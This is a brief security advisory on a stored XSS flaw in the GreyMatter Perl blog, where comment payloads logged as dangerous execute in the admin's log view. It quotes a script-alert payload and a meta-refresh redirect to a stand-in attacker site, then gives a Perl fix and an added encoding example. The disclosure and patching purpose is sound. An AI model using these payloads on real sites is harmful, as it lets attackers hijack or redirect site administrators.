XSS in GreyMatter blog
GreyMatter is a Perl-based web blog.
Official site: http://www.greymatterforums.com/
GM analyzes posted comments, and if a comment contains dangerous code (like
<script></script>), the administrator gets a message about it in the log
files. The log files contain not only the message but also the dangerous
code itself.
When the admin views the log files (Admin panel Options: "View Control Panel
Log"), the code executes in the admin's browser.
Example attack:
Add a comment:
Name: <script>alert('XSS')</script>
Comment:
<meta http-equiv="refresh" content="0;
url=http://site_with_danger_content.evil"/>
The admin then can't open the "View Control Panel Log" menu, because the
page redirects to the attacker's site.
Solution:
Edit gm-library.cgi like this:
-----------------------------------------------------------
# Read the control panel log.
open (FUNNYFEET, "gm-cplog.cgi");
@gmlogfile = <FUNNYFEET>;
close (FUNNYFEET);
foreach $gmlogfileline (@gmlogfile) {
    chomp ($gmlogfileline);
    # Swap the tags the log itself uses for placeholders.
    $gmlogfileline=~s/<b>/#BOLD_OPEN#/ig;
    $gmlogfileline=~s/<\/b>/#BOLD_CLOSED#/ig;
    $gmlogfileline=~s/<font size="1">/#FONT_OPEN#/ig;
    $gmlogfileline=~s/<\/font>/#FONT_CLOSED#/ig;
    # Replace every remaining angle bracket with #.
    $gmlogfileline=~s/[<>]/#/g;
    # Put the allowed tags back.
    $gmlogfileline=~s/#BOLD_OPEN#/<b>/ig;
    $gmlogfileline=~s/#BOLD_CLOSED#/<\/b>/ig;
    $gmlogfileline=~s/#FONT_OPEN#/<font size="1">/ig;
    $gmlogfileline=~s/#FONT_CLOSED#/<\/font>/ig;
    print "$gmlogfileline<BR>";
}
print qq(<font size="1">All danger tags replace with # symbol</font><BR>);
-------------------------------------------------------
Sorry for my English; it's not my primary language.
---------------------------------------------------------
http://www.securityinfo.ru
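
Added example, not part of the original advisory and not GreyMatter code: a variant of the fix above that HTML-encodes each log line on output and then restores only the four tags the fix allows, instead of replacing brackets with #. The function name render_log_line and the sample log lines are assumptions constructed for illustration; the real format of gm-cplog.cgi is not shown on this page.

```perl
#!/usr/bin/perl
# Added example (hypothetical helper, not GreyMatter's own code).
use strict;
use warnings;

# HTML metacharacters and their entity encodings.
my %ENTITY = (
    '&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
    '"' => '&quot;', "'" => '&#39;',
);

# The only markup allowed through, keyed by its encoded (lowercase) form.
my %ALLOWED = (
    '&lt;b&gt;'                       => '<b>',
    '&lt;/b&gt;'                      => '</b>',
    '&lt;font size=&quot;1&quot;&gt;' => '<font size="1">',
    '&lt;/font&gt;'                   => '</font>',
);

# One case-insensitive alternation over the encoded allow-list.
my $allowed_re = do {
    my $alt = join '|', map { quotemeta($_) } keys %ALLOWED;
    qr/($alt)/i;
};

sub render_log_line {
    my ($line) = @_;
    # 1. Encode everything, so nothing in the line is markup any more.
    $line =~ s/([&<>"'])/$ENTITY{$1}/g;
    # 2. Decode only exact matches of the allow-listed tags.
    $line =~ s/$allowed_re/$ALLOWED{lc $1}/g;
    return $line;
}

# Constructed sample lines; the payloads are the ones quoted in the advisory.
my @sample = (
    q{<b>Mon Jan 1</b> <font size="1">comment flagged</font>},
    q{Name: <script>alert('XSS')</script>},
    q{Comment: <meta http-equiv="refresh" content="0; url=http://site_with_danger_content.evil"/>},
);

print render_log_line($_), "<BR>\n" for @sample;
```

With this variant the submitted payload stays readable in the log view as inert text, while the # replacement alters it.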